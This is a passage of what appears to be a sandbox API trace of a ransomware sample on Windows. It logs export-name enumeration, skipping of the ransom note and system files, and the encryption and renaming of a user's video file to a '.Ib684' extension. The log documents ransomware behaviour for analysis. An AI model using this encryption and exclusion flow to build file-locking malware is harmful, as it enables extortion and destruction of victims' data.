[0087.325] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.325] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.325] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.325] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.325] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.325] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.325] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.326] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.326] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.326] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.326] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.326] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.326] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.326] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.326] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.326] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.326] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.326] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.326] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.326] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.326] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.326] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.326] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.326] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.326] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.327] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.327] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.327] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.327] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.327] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.327] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.327] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.327] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.327] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.327] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.327] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.327] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.327] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.327] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.327] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.328] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv") returned 78 [0087.328] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv.Ib684") returned 84 [0087.328] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\bqqtijyg2l71upfzbjul.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv.Ib684" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\bqqtijyg2l71upfzbjul.flv.ib684"), dwFlags=0x0) returned 1 [0087.328] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.328] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.329] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.329] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02f7200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb02f7200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb02f7200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.329] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.329] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9adb1fa0, ftCreationTime.dwHighDateTime=0x1d4c6e1, ftLastAccessTime.dwLowDateTime=0xc32948c0, ftLastAccessTime.dwHighDateTime=0x1d4cde3, ftLastWriteTime.dwLowDateTime=0xc32948c0, ftLastWriteTime.dwHighDateTime=0x1d4cde3, nFileSizeHigh=0x0, nFileSizeLow=0x28b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="dZ3NoWA.flv", cAlternateFileName="")) returned 1 [0087.329] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.330] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="autorun.inf") returned 1 [0087.330] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="boot.ini") returned 1 [0087.330] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="desktop.ini") returned 1 [0087.330] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="ntuser.dat") returned -1 [0087.330] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="iconcache.db") returned -1 [0087.330] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="bootsect.bak") returned 1 [0087.330] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="ntuser.dat.log") returned -1 [0087.330] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="thumbs.db") returned -1 [0087.330] lstrcmpiW (lpString1="dZ3NoWA.flv", lpString2="Bootfont.bin") returned 1 [0087.330] lstrlenW (lpString="dZ3NoWA.flv") returned 11 [0087.330] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.330] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.330] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.330] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.330] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.330] lstrlenW (lpString="dZ3NoWA.flv") returned 11 [0087.330] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.331] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="dZ3NoWA.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv" [0087.331] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\dz3nowa.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.331] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=10421) returned 1 [0087.331] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.331] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.331] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.331] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.331] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.332] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.332] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.332] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.333] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.333] CloseHandle (hObject=0x42c) returned 1 [0087.333] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.333] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.334] CloseHandle (hObject=0x0) returned 0 [0087.334] CloseHandle (hObject=0x428) returned 1 [0087.334] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.334] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.334] GetTickCount () returned 0x114e476 [0087.334] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.335] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.335] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.335] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.335] lstrlenA (lpString="kernel32.dll") returned 12 [0087.335] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.335] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.335] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.335] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.335] lstrlenA (lpString="ADDATOMA") returned 8 [0087.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.335] lstrlenA (lpString="ADDATOMW") returned 8 [0087.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.335] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.336] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.336] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.336] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.336] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.336] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.336] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.336] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.336] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.336] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.336] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.336] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.336] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.336] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.336] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.336] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.336] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.336] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.336] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.337] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.337] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.337] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.337] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.337] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.337] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.337] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.337] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.337] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.337] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.337] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.337] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.337] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.337] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.337] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.337] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.337] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.337] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.337] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.338] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.338] lstrcpyA (in: 